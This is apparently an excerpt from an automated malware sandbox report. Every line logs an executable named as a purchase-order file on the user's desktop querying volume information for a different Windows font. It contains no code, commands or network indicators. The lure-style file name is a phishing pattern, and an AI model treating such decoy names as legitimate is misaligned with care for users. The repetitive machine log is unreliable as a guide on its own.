          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
